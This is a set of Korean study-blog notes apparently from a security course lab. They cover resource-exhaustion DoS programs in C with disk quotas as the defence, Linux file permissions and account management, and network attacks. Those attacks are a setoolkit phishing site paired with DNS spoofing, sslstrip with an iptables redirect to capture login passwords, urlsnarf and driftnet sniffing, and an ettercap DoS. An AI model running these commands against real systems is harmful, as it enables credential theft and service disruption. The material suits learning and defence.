vi process.c


#include<stdio.h>

#include<unistd.h>


main()

{

        while(1);

        fork();

        return 0;

}


gnome-system-monitor 
 //쓸데없는 프로세스가 많이생겨 cpu가 부하된다.



ps -aux  //프로세스 확인



top으로 확인


'System Security' 카테고리의 다른 글

xinetd와 telnet  (0) 2019.02.22
쉘명령으로 cpu부하  (0) 2019.02.21
메모리 고갈공격(DOS)  (0) 2019.02.21
디스크 고갈 공격(DOS)  (0) 2019.02.21
쿼터 설정  (0) 2019.02.20


yum -y install gcc* gcc-* c++* qt* qt-devel*

 //라이브러리설치


vi mem.c

#include<stdio.h>

#include<stdlib.h>


main()

{

char*m;

printf("CTRL+C will terminate memory process...!\n");

while(1){

m=malloc(1000);  

}

}



gcc -o mem mem.c //컴파일

./mem    //실행  빨리 끄지않으면 메모리가 너무쌓여 팅김.



gnome-system-monitor // 확인





'System Security' 카테고리의 다른 글

쉘명령으로 cpu부하  (0) 2019.02.21
프로세스 공격  (0) 2019.02.21
디스크 고갈 공격(DOS)  (0) 2019.02.21
쿼터 설정  (0) 2019.02.20
파일시스템  (1) 2019.02.18


vi disk_attack.c


#include<unistd.h>

#include <sys/file.h>


main()

{

int attack;

char buf[100];

attack = creat("/root/tempfile",0777);

while(1){

write(attack,buf,sizeof(buf));

}

}


gcc -o  disk_attack disk_attack.c //컴파일

./disk_attac //실행



/root/tempfile 로 만들어짐  //파일크기가 비정상적으로 크다.





쿼터의 중요성

//DOS공격을 방어해준다.


'System Security' 카테고리의 다른 글

프로세스 공격  (0) 2019.02.21
메모리 고갈공격(DOS)  (0) 2019.02.21
쿼터 설정  (0) 2019.02.20
파일시스템  (1) 2019.02.18
계정관리  (0) 2019.02.14




1.HDD 추가


 1) 파티션 나누기


- vmware에서 HDD 추가 //20기가 줬음


-  fdisk -l //확인 



fdisk /dev/sdb

n  //새롭게 생성

p  // primary partition

1  //1번으로

엔터 //default값

엔터 //default값

w   //저장


fdisk -l



 2) 파일 시스템 생성

mkfs -t ext3 /dev/sdb1


file -s /dev/sdb1 //확인



 3) 마운트


mkdir /data   //요기에 마운트할거임.



vi /etc/fstab //아래와 같이 입력

/dev/sdb1 /data ext3 defaults,usrquota 0 0


reboot 후, df로 확인



4) 사용자 쿼터 적용

chmod 777 /data  //권한부여

cd /data    //들어간다.

touch quota.user    //사용자할당량 파일 생성

chmod 600 quota.user   //권한부여

quotacheck -a -n     /

convertquota /data   //aquota.user 가 생김.


quotaon /data   //실행


korea 사용자 생성


edquota korea   //디스크 할당량 제한



repquota -a //확인







설정 해준 값을 초과하면 밑에와 같은 결과가 출력됨





자기 폴더와 data 이외에서는 생성 삭제 등이 실행되지 않는다.


'System Security' 카테고리의 다른 글

프로세스 공격  (0) 2019.02.21
메모리 고갈공격(DOS)  (0) 2019.02.21
디스크 고갈 공격(DOS)  (0) 2019.02.21
파일시스템  (1) 2019.02.18
계정관리  (0) 2019.02.14

<시스템>


능동자 : 사용자,프로세스


수동자 : 파일(개체)/디렉터리, 주변장치


파일유형



파일종류, drwx(소유자) r-x(그룹) r-x(제3자) 2(링크 수) root(소유자) root(그룹명) 4096(파일크기) 2월 14(생성일) bin(파일명)


파일종류            

- : 일반파일

d : 디렉터리

l : 심볼릭링크

c : 문자장치

b : 블록장치


링크 

심볼릭 링크 : 원본파일과 다른 값 inode가 생긴다. //링크 수 증가o

     즉 ,원본 파일이 삭제되면 실행 불가.


하드 링크 : 원본파일과 동일한 값 inode가 생긴다.  //링크 수 증가 x

원본 파일이 삭제 되어도, 같은 값 inode링크가 있으면 실행 가능.


기본

디렉터리 : 777    umask : 022  -> 755   umask : /etc/bashrc

파일 : 666          umask : 022 -> 644


파일

r(4) : 파일의 내용을 읽을 수 있는 권한. 

w(2) : 파일의 내용을 생성,수정,삭제할 수 있는 권한.

x(1) :  파일을 실행할 수 있는 권한.

디렉터리

r(4) :  해당 디렉터리의 목록 출력할 수 있는 권한

w(2) : 해당 디렉터리에서의 파일/디렉터리(생성,수정,삭제)권한  

 //파일에 w권한이 없어도 디렉터리에 w권한이 있으면 수정가능.       //그룹또한 소유자그룹으로 자동으로 변경 된다.

 기본 권한이 755인이유


x(1) :  해당 디렉터리의 진입권


허가권

일반 허가권

특수 허가권

 특수권한

일반허가권 

일반허가권 

일반허가권 

특수권한

Setuid(4) 

 - S(실행권한x)  s(실행권한o)

 - root권한으로 실행되게 해줌.

Setgid(2)

- 그룹root권한으로 실행

Sticky(1)  

 - t로표시

 - 모든사용자에게 쓰기 권한이 주어졌음에도 불구하고제만큼은 

   해당파일의소유자,root만 가능하다.

-  즉 , 업로드 가능, 삭제는 불가능하게 할 수 있다.

ex)

rws //실행권한o 

rwS //실행권한x


Sticky

해당 소유자만 파일을 지울 수 있다.



root로도 아무 것도 안되게하는 명령어

chattr +i [파일명]  //수정 삭제 전부 안됨.

chattr +a [파일명] //cat으로만 수정이 가능.



심볼릭링크


touch 긴파일명


ln -s 긴파일명 간략파일명





하드링크

ln 파일명 파일명

//inode값 동일



파일 시간 수정


date 월 일 시 분 년 

touch 파일명 //바뀐 년도로 만들어 진다.


rdate -s time.bora.net //현재 날짜 갱신



파일의 종류 확인

file 파일명








'System Security' 카테고리의 다른 글

프로세스 공격  (0) 2019.02.21
메모리 고갈공격(DOS)  (0) 2019.02.21
디스크 고갈 공격(DOS)  (0) 2019.02.21
쿼터 설정  (0) 2019.02.20
계정관리  (0) 2019.02.14

/etc/passwd

 

 

test7  //사용자 계정

 

x   //패스워드가 암호화되어 shadow 파일에 저장 되어 있다.(x를 지우면 password

      없이 접속 가능

 

500  //사용자 번호

 

500 // 그룹 번호

 

: :   //실제 이름, 아무거나 입력해도 된다. 영향 x

 

/home/test7   // 사용자의 홈 디렉터리

 

/bin/bash   //사용자의 셸정의(이 구간을 지우면 패스워드가 중지된다.)

 

/etc/shadow

 

$1 (암호 알고리즘) $(비밀번호+salt)

 

$1   //MD5 알고리즘 (128bit)

$5  //SHA-256(256bit)

$6 //SHA-512(512bit)

 

useradd 이런 명령어가 실행되는 이유

/etc/login.defs 파일 안에 설정되어 있기 때문이다.

 

 

유저삭제

userdel

  -r : 이 옵션을 줘야지만 모든 파일과 디렉터리가 삭제된다.

 

/var/spool/mail  //계정에 대한 메일이 있다.

 

사용자 패스워드 역변환/변환

pwunconv    //원상 복구

pwconv       //shadow 파일 저장

 

계정 복구

/etc/skel/사용자 셸 환경설정 파일

 

 

사용자 일시 중지

1) passwd  -l 계정명   //일시 중지

               -u 계정명  //중지 해제

2) /bin/false

3) /sbin/nologin

 

 

root 사용자 원격 접속 허용

 

 /etc/securetty

 pts/1 .....

 

그룹생성

groupadd 생성명


사용자 그룹추가

usermod -G 그룹명 사용자

사용자 여러 그룹추가

usermod -G 그룹명, 그룹명 사용자

 

 

'System Security' 카테고리의 다른 글

프로세스 공격  (0) 2019.02.21
메모리 고갈공격(DOS)  (0) 2019.02.21
디스크 고갈 공격(DOS)  (0) 2019.02.21
쿼터 설정  (0) 2019.02.20
파일시스템  (1) 2019.02.18

setoolkit

1.

 

2.

3.

 

4.

 

5.

 

6.

service apache2 restart

 

 

7. dns 스푸핑과 연계

 

//네이버 도메인 입력시 피싱사이트가 뜸.

피싱사이트에서 로그인 시, 이렇게 스니핑할 수 있다.

 

 

cd .set/reports/     //스니핑한 정보가 들어 있다.

 

 


 

urlsnarf -i eth0 //공격대상자의 url위치를 파악할 수있다.

 

'Network Security' 카테고리의 다른 글

driftnet  (0) 2019.02.08
ssh 스니핑  (0) 2019.02.08
ettercap dos공격  (0) 2019.02.07
DNS 스푸핑  (0) 2019.02.07
arp 스푸핑  (0) 2019.02.07

driftent -i eth0

 

상대방이 무슨 이미지를 보는지 스니핑 할 수 있다.

 

'Network Security' 카테고리의 다른 글

피싱사이트  (0) 2019.02.08
ssh 스니핑  (0) 2019.02.08
ettercap dos공격  (0) 2019.02.07
DNS 스푸핑  (0) 2019.02.07
arp 스푸핑  (0) 2019.02.07

[ssh 스니핑]

 

 

[ip 포워딩]

//라우팅과 같은말

cd /proc/sys/net/ipv4

 

vi ip_forward

안에 값이 1로 되어야 사용할 수있다.

직접 수정은 불가능하므로, 명령어로 줘야한다.

[명령어]

echo 1 > ip_forward //값을 1로 변경 

sysctl -w net.ipv4.ip_forward=1

 

vi /etc/sysctl.conf      //컴퓨터를 껐다 켜도 설정한 값을 저장

net.ipv4.ip_foward =1 값의 주석을 해제한다.

 

 

 

 

 

[ssh 스니핑]

arp 스니핑 후 가능

 

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080  

포트80으로 들어오는 값을 8080포트로 보낸다.

 

sslstrip -l 8080

실행 시킨후 , 페북계정과 비번 입력

 

vi sslstrip.log

id와 비번 스니핑


 

 

 

 

'Network Security' 카테고리의 다른 글

피싱사이트  (0) 2019.02.08
driftnet  (0) 2019.02.08
ettercap dos공격  (0) 2019.02.07
DNS 스푸핑  (0) 2019.02.07
arp 스푸핑  (0) 2019.02.07

ettercap dos공격

 

vi dos.elt   

 

etterfilter ./dos.elt -o ./dos.ef   //dos.ef로 확장자를 변환

 

 

ettercap -i eth0 -T -q -F /root/dos.ef -M ARP /192.168.232.120///

 

 

windows7에서는 인터넷이 되지 않는다.


'Network Security' 카테고리의 다른 글

driftnet  (0) 2019.02.08
ssh 스니핑  (0) 2019.02.08
DNS 스푸핑  (0) 2019.02.07
arp 스푸핑  (0) 2019.02.07
Dos  (0) 2019.02.01

+ Recent posts